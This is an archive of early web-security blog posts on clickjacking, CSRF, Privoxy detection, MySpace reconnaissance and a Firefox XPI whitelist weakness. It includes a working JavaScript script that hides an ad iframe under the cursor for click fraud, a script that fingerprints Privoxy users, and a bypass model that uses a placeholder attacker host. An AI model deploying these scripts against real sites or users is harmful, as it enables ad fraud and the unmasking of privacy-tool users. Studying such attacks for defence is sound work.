web application security lab

Archive for the 'Random Security' Category

Stealing Mouse Clicks for Banner Fraud

Tuesday, January 16th, 2007

On the sla.ckers.org board Lobas asked a question about stealing clicks. The short answer is that you cannot force a click inside an iframe on another domain: the browser's cross-domain (same-origin) policy prohibits it, and with banner ads you never know what the links will be anyway. However, there is another way that Jeremiah Grossman mentioned a while back that I thought was pretty clever. You can move the banner ad's iframe so that it sits directly under the mouse pointer; when the user clicks, they are tricked into delivering their own click event to the iframe beneath the cursor.

I wrote some sample code based on one of those annoying cursor-following scripts to show that you can force text in a div (which could just as well be an iframe to the banner ad) to be placed immediately below the cursor. What I haven't shown is that the onclick event handler can be used to make the div appear at the right moment, or that you can make it semi-transparent, or any of the other fun tricks. But this proof of concept shows that iframes are not really a particularly good way of protecting against click events. Banner advertisers beware!
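As an added illustration (this is not the sample code from the post, and the ad URL is a placeholder), here is the core of the trick in JavaScript: the geometry that keeps a frame centred under the pointer, kept separate from the DOM wiring so it can be exercised outside a browser.

```javascript
// Added example, not the post's own script. The banner URL is a placeholder.
// Geometry is separated from DOM wiring so the placement logic runs without a browser.

// Top/left CSS position that centres a box of the given size on the cursor,
// clamped so the frame never leaves the viewport.
function overlayPosition(cursorX, cursorY, boxW, boxH, viewW, viewH) {
  const clamp = (v, lo, hi) => Math.min(Math.max(v, lo), hi);
  return {
    left: clamp(cursorX - boxW / 2, 0, Math.max(0, viewW - boxW)),
    top: clamp(cursorY - boxH / 2, 0, Math.max(0, viewH - boxH)),
  };
}

// Is the point (x, y) inside the rectangle? Used to confirm the cursor really
// sits over the frame after placement.
function contains(rect, x, y) {
  return x >= rect.left && x < rect.left + rect.width &&
         y >= rect.top && y < rect.top + rect.height;
}

// Browser side: an iframe to the ad that follows the mouse. With opacity 0 it is
// invisible but still receives the mousedown, so the user's click lands inside
// the cross-domain frame even though our page cannot script it.
function attachClickStealer(doc, adUrl, boxW = 468, boxH = 60, opacity = 0) {
  const frame = doc.createElement('iframe');
  frame.src = adUrl;
  frame.width = String(boxW);
  frame.height = String(boxH);
  frame.style.position = 'fixed';
  frame.style.border = '0';
  frame.style.opacity = String(opacity);
  frame.style.zIndex = '2147483647';
  doc.body.appendChild(frame);
  doc.addEventListener('mousemove', (ev) => {
    const p = overlayPosition(ev.clientX, ev.clientY, boxW, boxH,
                              doc.documentElement.clientWidth,
                              doc.documentElement.clientHeight);
    frame.style.left = p.left + 'px';
    frame.style.top = p.top + 'px';
  });
  return frame;
}

// Only wire up the DOM when running in a browser.
if (typeof document !== 'undefined') {
  attachClickStealer(document, 'https://ads.example/banner.html'); // placeholder URL
}
```

Load this on a page and the frame follows the cursor at zero opacity; wherever the user clicks, the mousedown goes to the frame. This is the class of attack that the later X-Frame-Options header and CSP's frame-ancestors directive let a framed site refuse, which is the advertiser-side fix the post is implicitly asking for.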

Fierce Finds MySpace Adminstration Console

Tuesday, January 16th, 2007

I can't say this really surprises me too much, given my own results against other high-profile domains, but x90 (NOP) was able to locate MySpace's administration console. That just sounds like a bad idea - leaving the gateway to your administration publicly facing. He was also able to get it to error out, which produced some interesting results.

Fierce is a good first-pass reconnaissance tool, and as you can tell it shows you things that aren't obvious at first blush when you aren't sure what is hosted at a domain. In just a few minutes of testing you can uncover huge swaths of vulnerable targets to exploit, and this is no exception. It's neat seeing people try it out and see what it can find for them. Let me know if anyone else finds interesting results or case studies. In the meantime, I hope MySpace knows enough to take this server off-line until they can harden it, or at minimum move it to a less obvious place.

Surfing the Web Can Make You a Sex Offender

Sunday, January 14th, 2007

This is a really upsetting story about a teenager whose computer was infected by a trojan and used as a file server for child pornography, and who was then nearly prosecuted as a sex offender. The sex offender charge was based on a plea deal after he admitted to showing other teenage boys a Playboy magazine. The circumstances are so ridiculous it's just painful to read. The gist is that the boy visited a porn site that infected his computer, and the police then detected the computer uploading child pornography.

After being sent this, I was asked whether having a firewall and anti-virus is enough to protect your computer. Unfortunately the answer is no. Let's think about session riding (CSRF) for a second. With a simple IMG tag it is trivial to make any user's browser fetch whatever the attacker wants from any website that doesn't protect itself. In this way a user can visit an otherwise benign site and be forced, by proxy, to download child pornography, perform attacks on servers, or do whatever else the attacker wants. Very scary.

VMware is finally free

Thursday, January 11th, 2007

I’m not a huge fan of virtualization in production environments (it feels an awful lot like putting all your eggs in one basket, and slowing everything down in the process), but you cannot beat it for testing. Today I found out that VMware Server is now free to download. Their major upsell is service contracts and add-ons, but if you don’t need those, or only need it for testing, and you run Windows but want to run other operating systems or perform potentially dangerous tests, this is the software for you.

If you’ve never played with VMware before, you’re missing out. You can boot from an ISO, or install your own OS into what is essentially one large file that represents the virtual machine’s disk. That machine can be copied too. So if you want to run a dangerous test, you copy the file, boot it, install your dangerous software, run it, perform your tests, then shut it down and delete it without worry, since it never touched your real drive or your original image. Perfect! If you’ve got an extra copy of a distro lying around that you never got to play with and didn’t feel like repartitioning a drive, this is definitely the software for you.

SeaLand for Sale

Tuesday, January 9th, 2007

A few years back I had an interesting business model that required me to talk to places like Sealand. Sealand, the self-proclaimed smallest country in the world, is now for sale. The reason Sealand matters to the security world is that it is not just an oddity with air-gap protection; it is also home to the world’s most secure data center. With physical access cut off, ultra-secure computers and networks, it is by far the most secure commercial hosting environment on earth.

Anyone have a billion to spend? I have got some great business models. Unfortunately the island is probably more hassle than it’s worth. Being virtually unknown outside the security community doesn’t help much. It is also obviously under current and constant threat of being taken over by Britain, making it a risky proposition for any high-net-worth activities that you want offshore and out of reach of extradition treaties. It’ll be interesting to see what the future holds for the island state.

Top Ten Threats for 2007 - As Reported by Richard Stiennon

Friday, December 29th, 2006

If you don’t remember who Richard Stiennon is, think back a few years and see if you can remember the words “IDSs are dead”. Ring a bell? He was a security analyst at Gartner. I met him several years ago, although I’m sure he would have no idea who I am now, even though I accurately predicted the rise of event correlation (SIM) services. Well, I found his blog almost by accident today, and his most recent post actually turned out to be fairly interesting. He wrote about the top 10 threats for 2007. He was a little scattered in the topics he went into, but most of them were pretty interesting to discuss. Here are some of my thoughts:

His second and third predictions are that DDoS in support of phishing and fraud will become a big deal in 2007. I really don’t see this one happening. I get what he’s saying, but DDoS is noisy and doesn’t actually aid in phishing. Plus, if the bad guys have compromised servers, why not use them for more phishing, which is far more lucrative than shutting down a server (except in the random cases of extortion - “pay me $10k and I’ll let your server come back up”)? I just don’t believe this is happening all that often. The bad guys can make $10k per phishing incident; it’s way more scalable to stick to phishing. I only know of two cases where DDoS extortion has happened, and both of them were online casinos.

He suggests in his fourth bullet that DNS will be a huge target over the coming year. Maybe. It’s hard to say, especially since it’s far easier to let DNS work for you, as in the case of XSS malware, than to attack it. I’m not sure I agree with this, since there are easier ways to attack a target. But you never know. I also thought pharming would never be a big deal when everyone was hyping that one up and… er… no wait, it never was. ;)

His seventh bullet talks about MySpace having to grow up and become more secure like the rest of its competitors. I don’t know that I agree that this is the 7th largest threat in 2007 (shutting down one community site), but I think the ramifications of why this is happening are easily within the top 10. He’s got a good point here. Something we have not spent enough time thinking about is the downstream impact of these types of issues on large businesses. Could a few XSS holes literally shut down a billion-dollar company? That’s a big deal.

Number eight is also about XSS, although Richard doesn’t mention the word. He talks about backdooring media files (pdp’s backdoored QuickTime and MP3 files, no doubt) as well as spam advertising inside movie files. I would hardly call this the eighth biggest threat on the Internet, because the files can be scanned for the backdoor, and who cares if there is a little spam? It’s not a big threat to the Internet. So, unfortunately, I think he’s way off on this one.

Number nine is about how the global network infrastructure is showing signs of strain under the heavyweight content of the dynamic Internet. I doubt this will really mean much to anyone, other than more use of content delivery networks and additional money for the carriers who lay fiber (which was his comment).

His number ten threat is that Vista isn’t going to do anything in terms of security. Well, that’s probably true, but that’s not a new threat; it’s just a failure to increase security to match the increase in attacks against the new platform. But who wants to go after desktop machines when everyone is putting their information online anyway? That’s where the real money is. The only reason people go after home computers these days is to install keyloggers and turn them into spam/phishing machines. The bigger issue is that everything is becoming web-enabled. So my prediction is that we’re going to see a lot more high-profile information disclosures next year. I think he had the right idea, but he didn’t take it to the next obvious place.

I don’t mean to put Richard down here - he’s a very bright guy. Unfortunately, I think this year he spent too much time talking to a few people who didn’t have their finger on the pulse of the real issues. No doubt 2007 will be interesting though. I’m looking forward to it.

Detecting Privoxy Part II

Wednesday, December 20th, 2006

Well, the old trick still works, but I just wasn’t satisfied with it. I really like to break Privoxy for some reason. I have nothing against it; it just seems like a kludge to me, a kludge that needs to be broken. So I decided to come up with another way to do the exact same thing, only in a trickier way. This time I used a technique stolen right out of Jeremiah’s handbook: CSS and JavaScript to detect whether an embedded CSS file has been applied or not.

Click here with Privoxy and JavaScript turned on to have it detect you. That’s right: I noticed that Privoxy has its own custom style sheet. It embeds it whenever it gives you an error message (which is relatively often). That style sheet overrides a particular class called “warning”. So I created an EM tag with a warning class, and then wrote a little piece of JavaScript, stolen almost word for word from Jeremiah’s CSS history hack, and poof.

You can now (again) detect if users are using Privoxy, which might tell you something about them, or may cause you to take different actions based on that fact. Privoxy isn’t so private after all.
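As an added example (not the post’s own script), the same detection written out: link Privoxy’s stylesheet, put an EM with class “warning” next to an identical EM without it, and compare computed styles. The stylesheet address config.privoxy.org/send-stylesheet is an assumption about Privoxy’s internal URL, and the list of properties to probe is mine; the comparison logic is kept DOM-free so it runs outside a browser.

```javascript
// Added example, not code from the original post.
// Assumed: Privoxy serves its template stylesheet at this internal address.
const PRIVOXY_CSS = 'http://config.privoxy.org/send-stylesheet';

// Properties to compare. The exact values Privoxy sets are not hard-coded; we only
// ask whether the .warning element ends up styled differently from the control.
const PROBE_PROPS = ['color', 'font-weight', 'text-decoration-line'];

// Given computed styles of a probe element (class "warning") and a control element
// (same tag, no class), return the properties on which they differ.
function stylesDiffer(probeStyle, controlStyle, props = PROBE_PROPS) {
  return props.filter((p) => String(probeStyle[p]) !== String(controlStyle[p]));
}

// The stylesheet could only have been applied if something answered for
// config.privoxy.org, i.e. a Privoxy instance sits between us and the user.
function looksLikePrivoxy(probeStyle, controlStyle) {
  return stylesDiffer(probeStyle, controlStyle).length > 0;
}

// Browser side: insert the elements, link the stylesheet, wait for it to load
// (or fail), then compare. Elements must be in the document for getComputedStyle.
function detectPrivoxy(doc, callback) {
  const probe = doc.createElement('em');
  probe.className = 'warning';
  probe.textContent = 'probe';
  const control = doc.createElement('em');
  control.textContent = 'control';
  doc.body.append(probe, control);

  const link = doc.createElement('link');
  link.rel = 'stylesheet';
  link.href = PRIVOXY_CSS;
  const finish = () => {
    const cs = (el) => doc.defaultView.getComputedStyle(el);
    const probeStyle = {};
    const controlStyle = {};
    for (const p of PROBE_PROPS) {
      probeStyle[p] = cs(probe).getPropertyValue(p);
      controlStyle[p] = cs(control).getPropertyValue(p);
    }
    callback(looksLikePrivoxy(probeStyle, controlStyle), stylesDiffer(probeStyle, controlStyle));
  };
  link.onload = finish;
  link.onerror = finish; // no Privoxy: the fetch fails and the two elements match
  doc.head.appendChild(link);
}

if (typeof document !== 'undefined') {
  detectPrivoxy(document, (found, props) =>
    console.log(found ? 'Privoxy detected via ' + props.join(', ') : 'no Privoxy stylesheet applied'));
}
```

Comparing against a control element rather than against a hard-coded colour is what makes this robust to the user’s own default styles; it is the same comparison Jeremiah’s CSS history hack makes between visited and unvisited links.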

The Movie Hackers Isn’t So Unrealistic After All

Tuesday, December 19th, 2006

I got this link today from Reuters discussing how a 64-year-old hacker decided to write a logic bomb to crash his former company’s stock. Wow, has this guy been watching Hackers too much or what? Next people are going to start skateboarding in the office wearing capes! I was really surprised to read this, because a) deleting files never crashes a stock, or every virus on the planet would have a high potential for destroying corporate valuations, and b) he didn’t attempt to do it publicly (and public perception is the only thing that drives stock price).

But this is interesting because it’s a common misperception that hackers can completely wipe out anything they put their minds to. In some cases that’s true, but clearly not in all cases. I think people have sort of focused on the hocus-pocus aspect of computer security. I think of it a lot like a magic show: it’s amazing and wonderful until you actually see how it works. Then it’s boring, and people are only amazed by the ingenuity of the trick, not by the trick itself. That’s one of the reasons I don’t share a lot of what I know with non-security folks. They are less impressed, and it doesn’t actually make them hackers in the process. At best it makes them slightly savvy non-tech types. At worst it makes them feel like they can hack things, and then they get caught doing stupid stuff.

Anyway, although this wasn’t web app related, I thought it was interesting enough to share for anyone who missed this in the news.

CSRF with Word Part II

Friday, December 15th, 2006

Okay, I didn’t write Part I, and really didn’t even know about it until today, although I invented something like it months and months ago. The first person to talk about CSRF within Word was Michael Daw. Very interesting concept. In the context where I was using a similar technique, I was using it primarily as a web bug. Michael Daw’s technique is good, but I like mine better because, while it is probably just as noisy, it leaves no visible cues for the victim.

Michael includes a remote image (I’ve had mixed luck trying this myself). My failures in trying nearly the exact same thing were fixed when I came up with another way to inject embedded files into Word. Those files were actually CSS elements that Word will happily go and fetch for you. Click here to get the scoop on how to inject CSS files into Word. Using this same technique you can easily turn this into a complex platform for doing many CSRFs through a single Word file. See what happens when no one tells me about these things? Sheesh! Nice work Michael, I just wish I had seen it when it came out!

Firefox Allows Any Site To Inject XPI Via XSS Via Delegation

Wednesday, December 13th, 2006

Apparently this is true, although I can’t for the life of me figure out why it should be allowed. I ran across an article at DCortesi’s site talking about how Firefox has delegated its security to Google for installation of the Google Sync XPI. Pretty scary, actually. What this means is that if an XSS hole were ever found in any whitelisted domain (including XSS in their server, MITM through your proxy server, etc…), Firefox will happily allow you to download XPI files. I’ve talked with a few people about this off and on in a different context: loading an XPI file into a data: URI on the whitelisted domain. Yeah, that’s scary. This is worse.

This sort of delegation of authority to other domains that you haven’t whitelisted is worse than the data: URI trick because the size is unlimited (I have a feeling the data: URI has an upper bound, although I have been able to get one of 4 KB to work, so maybe not). Additionally you can load multiple files, and the URL is much smaller if you don’t have to use a data: URI. Anyone have any references on the upper bound?

All of this seems especially bad when Google hasn’t been particularly good about keeping its site bug-free. But it’s not just that Google is untrustworthy. You could turn any site into a delegate the way Firefox has been built - as long as you can force a redirection. If you can force the redirection, it will allow the file to be downloaded. I haven’t tested this, but I’m sure someone on the boards will. I’ll be curious to see if it’s really as bad as I think it is. The web just isn’t safe enough to allow delegates. I guess it’s time to clean out my exception list until I need to install something again.

This may yet prove my theory wrong - that it’s not the browser that’s flawed, it’s the plugins. In this case it definitely is the browser.
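As an added model (this is not Firefox’s code; the hostnames and the redirect table are made up for the example), here is the difference between deciding on the page that initiated the install and deciding on the host the XPI is finally fetched from after redirects, which is the check the redirect trick above exploits:

```javascript
// Added example, not Firefox's implementation. Hosts and redirects are constructed.

// Hosts the user has allowed to install extensions (constructed whitelist).
const WHITELIST = new Set(['addons.mozilla.org', 'www.google.com']);

// Constructed redirect table: an open redirect on a whitelisted host that bounces
// the browser to an attacker-controlled XPI.
const OPEN_REDIRECTS = {
  'https://www.google.com/url?q=https://evil.example/sync.xpi': 'https://evil.example/sync.xpi',
};

function hostOf(url) {
  return new URL(url).hostname;
}

// Follow redirects (bounded) and return the URL the bytes actually come from.
function resolveFinalUrl(url, redirects = OPEN_REDIRECTS, maxHops = 10) {
  let cur = url;
  for (let i = 0; i < maxHops && redirects[cur] !== undefined; i++) cur = redirects[cur];
  return cur;
}

// Flawed policy: trust is granted because the initiating page is on a whitelisted
// host, regardless of where the XPI itself comes from. An XSS hole on that host,
// or an open redirect from it, is enough.
function installAllowedByInitiator(pageUrl, _xpiUrl, whitelist = WHITELIST) {
  return whitelist.has(hostOf(pageUrl));
}

// Stricter policy: the initiating page must be whitelisted AND the final URL the
// XPI is fetched from, after following redirects, must also be on a whitelisted host.
function installAllowedByOrigin(pageUrl, xpiUrl, whitelist = WHITELIST, redirects = OPEN_REDIRECTS) {
  const finalUrl = resolveFinalUrl(xpiUrl, redirects);
  return whitelist.has(hostOf(pageUrl)) && whitelist.has(hostOf(finalUrl));
}

// Stand-alone run: an XSS'd page on a whitelisted host pointing at an attacker XPI.
const page = 'https://www.google.com/search';
const direct = 'https://evil.example/sync.xpi';
const bounced = 'https://www.google.com/url?q=https://evil.example/sync.xpi';
console.log('by initiator, direct :', installAllowedByInitiator(page, direct));
console.log('by initiator, bounced:', installAllowedByInitiator(page, bounced));
console.log('by origin, direct    :', installAllowedByOrigin(page, direct));
console.log('by origin, bounced   :', installAllowedByOrigin(page, bounced));
```

Even the stricter check still trusts every page on a whitelisted host, so an XSS hole or an upload feature on that host remains enough to get an extension installed, which is exactly the post’s complaint about delegating trust to domains. Mozilla eventually moved to mandatory extension signing, which verifies the package itself rather than where it was fetched from.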